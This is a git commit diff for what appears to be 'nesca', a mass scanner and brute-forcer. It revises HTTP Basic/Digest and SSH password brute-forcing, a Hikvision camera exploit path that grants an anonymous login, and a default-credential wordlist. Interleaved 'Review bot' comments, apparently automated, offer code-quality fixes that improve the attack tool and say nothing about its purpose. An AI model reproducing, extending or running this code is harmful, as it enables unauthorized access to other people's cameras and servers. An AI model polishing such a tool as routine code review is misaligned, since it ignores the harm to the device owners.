Multiple connection issues fixes.

cora32 2015-04-30 22:21:12 +03:00
parent 7f363c4d48
commit 93e4f2e141
10 changed files with 80 additions and 93 deletions


@ -47,15 +47,19 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode
return 0;
}
lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::string *buff) {
lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
string lpString;
lopaStr lps = {"UNKNOWN", "", ""};
int passCounter = 0;
int res = 0;
int isDig = Utils::isDigest(buff);
std::string buff;
Connector con;
Sleep(1000);
con.nConnect(ip, port, &buff);
int isDig = Utils::isDigest(&buff);
if (isDig == -1) {
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a></span>");
strcpy(lps.login, "");
return lps;
@ -63,14 +67,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
else if (isDig == 1) {
if (digestMode != true) {
digestMode = true;
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a>");
}
}
else {
if (digestMode != false) {
digestMode = false;
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a>");
};
}
@ -78,9 +82,9 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
std::string buffer;
if (commenceHikvisionEx1(ip, port, digestMode)) {
stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
QString(ip) + ":" +
QString::number(port) + ")");
//stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
// QString(ip) + ":" +
// QString::number(port) + ")");
strcpy(lps.login, "anonymous");
strcpy(lps.pass, "\177\177\177\177\177\177");
return lps;
@ -124,14 +128,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
return lps;
}
lopaStr BA::BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer) {
lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) {
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
++baCount;
++BrutingThrds;
const lopaStr &lps = BABrute(ip, port, digestMode, buffer);
const lopaStr &lps = BABrute(ip, port, digestMode);
--BrutingThrds;
return lps;
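Review bot: The expression `QString(ip).mid(0, QString(ip).indexOf("/"))` is now repeated in three messages in BABrute, with no comment explaining that `ip` can carry a path suffix here. Compute it once at the top, for example `const QString host = QString(ip).section('/', 0, 0); // ip may be "addr/path"; links use the bare host`, and reuse `host` in each href. The return value of `con.nConnect(ip, port, &buff)` is discarded, so a failed request and a response without a 401 presumably both land in the `isDig == -1` branch and are reported the same way; check the result or say in a comment that this is intended. The commented-out `doEmitionGreenFoundData` block should be deleted rather than left in place. BABrute and BALobby both continue outside the visible hunks.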


@ -8,11 +8,11 @@
class BA {
private:
static lopaStr BABrute(const char *ip, const int port, bool digestMode, const std::string *buffer);
static lopaStr BABrute(const char *ip, const int port, bool digestMode);
public:
static int checkOutput(const string *buffer, const char *ip, const int port);
static lopaStr BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer);
static lopaStr BALobby(const char *ip, const int port, bool digestMode);
};
#endif // BASICAUTH_H


@ -161,11 +161,8 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
int proxyPort = std::atoi(gProxyPort);
if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
}
else curl_easy_setopt(curl, CURLOPT_PROXY, "");
if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
@ -200,8 +197,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
else res = curl_easy_perform(curl);
int sz = buffer->size();
if (res == CURLE_OK ||
(port == 21 && sz > 0)) {
if (res == CURLE_OK || (port == 21 && sz > 0)) {
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
Activity += sz;
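Review bot: In the first hunk `proxyPort` is an `int`, but libcurl documents `CURLOPT_PROXYPORT` as taking a `long`, and passing an `int` through the variadic `curl_easy_setopt` is undefined where the two types differ in size; use `curl_easy_setopt(curl, CURLOPT_PROXYPORT, static_cast<long>(proxyPort));`. The rewritten lines also appear to set `CURLOPT_PROXY` to `gProxyIP` unconditionally, so a configured proxy host with an out-of-range port is now used with libcurl's default proxy port instead of being disabled. If that is intended, a one-line comment should say so. The bound `proxyPort < 65535` also rejects the valid port 65535. nConnect starts and ends outside both hunks.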


@ -4,7 +4,6 @@
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
char hostStr[128] = {0};
ZeroMemory(hostStr, sizeof(hostStr));
strcpy(hostStr, user);
@ -14,6 +13,7 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
if (curl)
{
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
curl_easy_setopt(curl, CURLOPT_URL, host);
curl_easy_setopt(curl, CURLOPT_PORT, port);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
@ -22,23 +22,18 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
} else {
curl_easy_setopt(curl, CURLOPT_PROXY, "");
}
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
} else curl_easy_setopt(curl, CURLOPT_PROXY, "");
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, sshTimeout);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, sshTimeout);
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
int res = curl_easy_perform(curl);
socket_t sock;
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(res != CURLE_OK) {
curl_easy_cleanup(curl);
++ssh;
return -2;
}
if (res != CURLE_OK) {
curl_easy_cleanup(curl);
return -2;
}
socket_t sock = -1;
res = curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(sock != -1) {
ssh_session ssh_session = ssh_new();
@ -49,13 +44,14 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return -1;
};
ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr);
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
res = ssh_connect(ssh_session);
if (res != SSH_OK) //Offline
@ -88,22 +84,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return 0;
}
char _get_ssh_banner(const char *ip, int port) {
char recvBuff[256] = {0};
std::string buffer;
Connector con;
con.nConnect(ip, port, &buffer);
int sz = buffer.size();
if(sz != 0)
{
strncpy(recvBuff, buffer.c_str(), sz < 256 ? sz : 256);
};
return *recvBuff;
}
int check_ssh_pass(const char *user, const char *pass,
const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
@ -166,24 +146,25 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1;
}
QString strIP;
QString strPort;
int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
{
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
const char &banner = _get_ssh_banner(ip, port);
if(strlen(&banner) > 0)
std::string sshBanner;
Connector con;
con.nConnect(ip, port, &sshBanner);
if (strlen(sshBanner.c_str()) > 0)
{
//BruteUtils::BConInc();
++BrutingThrds;
int res = SSHBrute(ip, port, buffer, &banner);
int res = SSHBrute(ip, port, buffer, sshBanner.c_str());
--BrutingThrds;
//BruteUtils::BConDec();
return res;
};
return -1;
} else return -1;
}
}
return -1;
}


@ -1227,13 +1227,12 @@ int _specBrute(const char *ip, int port,
{
const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(),
port,
(strcmp(comment, "[DIGEST]") == 0 ? true : false),
buffer);
(strcmp(comment, "[DIGEST]") == 0 ? true : false));
if (strcmp(lps.other, "404") == 0) {
stt->doEmitionRedFoundData("BA - 404 <a style=\"color:#717171;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + QString(path) + "/\">" +
QString(ip) + ":" + QString::number(port) + QString(path) + "</a>");
QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + "</a>");
return -1;
}
@ -2512,8 +2511,8 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
}
else if (flag == 34) //Hikvision ip cam
{
if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "Basic Authorization", cp, size, buffcpy) == -1){
_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "Basic Authorization", cp, size, buffcpy);
if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size, buffcpy) == -1){
_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size, buffcpy);
}
}
else if (flag == 35) //EasyCam
@ -2673,7 +2672,7 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
char log[512] = { 0 };
++AnomC1;
const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false, buffcpy);
const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false);
sprintf(log, "[HFS]:<a href=\"http://%s:%d/\"><span style=\"color: #a1a1a1;\">%s:%d</span></a><font color=\"#0084ff\"> T: </font><font color=\"#ff9600\">%s Pass: %s:%s</font>",
ip, port, ip, port, finalstr, lps.login, lps.pass);
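Review bot: The Hikvision branch of Lexems::filler now passes `"[DIGEST]"` where it passed `"Basic Authorization"`, and in _specBrute that argument appears to be the `comment` compared by `strcmp(comment, "[DIGEST]") == 0`. A display label is therefore doubling as the switch that selects the authentication mode, and nothing at either site says so. Add a named constant for the label, or at least a comment at the call such as `// "[DIGEST]" selects digest mode in _specBrute`. The `? true : false` around the comparison is redundant, since `strcmp(comment, "[DIGEST]") == 0` is already a bool. Both functions extend beyond the visible hunks.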


@ -1,3 +1,6 @@
ssl vpn
Ref1=http
hello. goodbye.
Analog Telephone Adapter
IP Dect -
AnyGate


@ -172,7 +172,7 @@ void _LoadPersInfoToLocalVars(int savedTabIndex) {
gMode = 1;
gThreads = ui->lineEditThread->text().toInt();
strcpy(currentIP, ui->lineEditStartIPDNS->text().toLocal8Bit().data());
strcpy(currentIP, ui->dnsLine->text().toLocal8Bit().data());
strcpy(gTLD, ui->lineILVL->text().toLocal8Bit().data());
strncpy(gPorts, ("-p" + ui->dnsPortLine->text()).toLocal8Bit().data(), 65536);
gPorts[ui->dnsPortLine->text().length() + 2] = '\0';
@ -536,7 +536,9 @@ void SetValidators()
QRegExp("([\\d*|.|//|-])+"),
NULL
);
ui->ipLine->setValidator(validator);
validator = new QRegExpValidator(QRegExp("\\d{1,3}"), NULL);
ui->importThreads->setValidator(validator);
ui->threadLine->setValidator(validator);
@ -551,7 +553,7 @@ void SetValidators()
ui->threadDelayBox->setValidator(validator);
validator = new QRegExpValidator(QRegExp("(\\w|-|\\.|\\[|\\]|\\\\)+"), NULL);
ui->lineEditStartIPDNS->setValidator(validator);
ui->dnsLine->setValidator(validator);
validator = new QRegExpValidator(QRegExp("(\\w|-|\\.)+((\\w|-|\\.)+)+"), NULL);
ui->lineILVL->setValidator(validator);
@ -1401,7 +1403,7 @@ void nesca_3::slotSaveImage(QAction *qwe)
{
QString fn = QString::number(QT.msec()) + "_" +
(ME2ScanFlag ? QString("ME2") : QString("Voice")) + "_" +
(ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png";
(ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png";
int ax = 27;
int ay = 2;
int w = ui->graphicLog->width() + 30;
@ -1444,7 +1446,7 @@ void nesca_3::slotSaveImage(QAction *qwe)
{
QString fn = QString::number(QT.msec()) + "_" +
(PieStatFlag ? "PieStat" : "QoS") + "_" +
(ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png";
(ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png";
QPixmap pixmap(ui->graphicLog->width(), ui->graphicLog->height());
QPainter painter(&pixmap);
@ -2094,14 +2096,15 @@ void nesca_3::ConnectEvrthng()
connect ( ui->restoreDefaultPorts1, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->restoreDefaultPorts2, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->restoreDefaultPorts3, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->lineEditStartIPDNS, SIGNAL( textChanged(QString) ), this, SLOT( DNSLine_ValueChanged(QString) ) );
connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->lineEditStartIPDNS, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsLine, SIGNAL(textChanged(QString)), this, SLOT(DNSLine_ValueChanged(QString)));
connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->dnsLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->logoLabel, SIGNAL( clicked() ), this, SLOT( logoLabelClicked() ) );
connect ( ui->me2ScanBut, SIGNAL( clicked() ), this, SLOT( activateME2ScanScene() ) );
connect ( ui->QoSScanBut, SIGNAL( clicked() ), this, SLOT( activateQoSScanBut() ) );
@ -2227,7 +2230,7 @@ void RestoreSession()
qLex.replace("[az]", "\\l");
qLex.replace("[0z]", "\\w");
qLex.replace("[09]", "\\d");
ui->lineEditStartIPDNS->setText(qLex);
ui->dnsLine->setText(qLex);
lex = strtok(NULL, " ");
if(strstr(lex, ".") != NULL) {
strcpy(gTLD, lex);
@ -2722,18 +2725,18 @@ void nesca_3::IPScanSeq()
void nesca_3::DNSScanSeq()
{
if (ui->lineEditStartIPDNS->text() != "")
if (ui->dnsLine->text() != "")
{
if (ui->dnsPortLine->text() != "")
{
if (ui->lineEditStartIPDNS->text().indexOf(".") > 0)
if (ui->dnsLine->text().indexOf(".") > 0)
{
stopFirst = false;
ui->tabMainWidget->setTabEnabled(0, false);
ui->tabMainWidget->setTabEnabled(2, false);
QStringList lst = ui->lineEditStartIPDNS->text().split(".");
ui->lineEditStartIPDNS->setText(lst[0]);
QStringList lst = ui->dnsLine->text().split(".");
ui->dnsLine->setText(lst[0]);
QString topLevelDomainStr;
for (int i = 1; i < lst.size(); ++i)
{
@ -2746,7 +2749,7 @@ void nesca_3::DNSScanSeq()
saveOptions();
stt->setMode(1);
stt->setTarget(ui->lineEditStartIPDNS->text());
stt->setTarget(ui->dnsLine->text());
stt->setPorts(ui->dnsPortLine->text().replace(" ", ""));
stt->start();


@ -190,7 +190,7 @@
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);border:none;</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="maxLength">
<number>4096</number>
@ -398,7 +398,7 @@
<attribute name="title">
<string>DNS Scan</string>
</attribute>
<widget class="QLineEdit" name="lineEditStartIPDNS">
<widget class="QLineEdit" name="dnsLine">
<property name="geometry">
<rect>
<x>110</x>
@ -501,7 +501,7 @@
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="maxLength">
<number>4096</number>
@ -808,7 +808,7 @@ color: rgb(214, 214, 0);</string>
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="placeholderText">
<string>80,81,8080,8888,21,6667,7000</string>
@ -3320,7 +3320,7 @@ background-color: #000000;</string>
<tabstop>ipLine</tabstop>
<tabstop>ipmPortLine</tabstop>
<tabstop>threadLine</tabstop>
<tabstop>lineEditStartIPDNS</tabstop>
<tabstop>dnsLine</tabstop>
<tabstop>lineILVL</tabstop>
<tabstop>dnsPortLine</tabstop>
<tabstop>lineEditThread</tabstop>


@ -1,4 +1,5 @@
hw230f8034t:17932yhf823
admin:
root:root
root:admin
admin:admin


@ -1 +1 @@
24B9D-DD
24B9E-852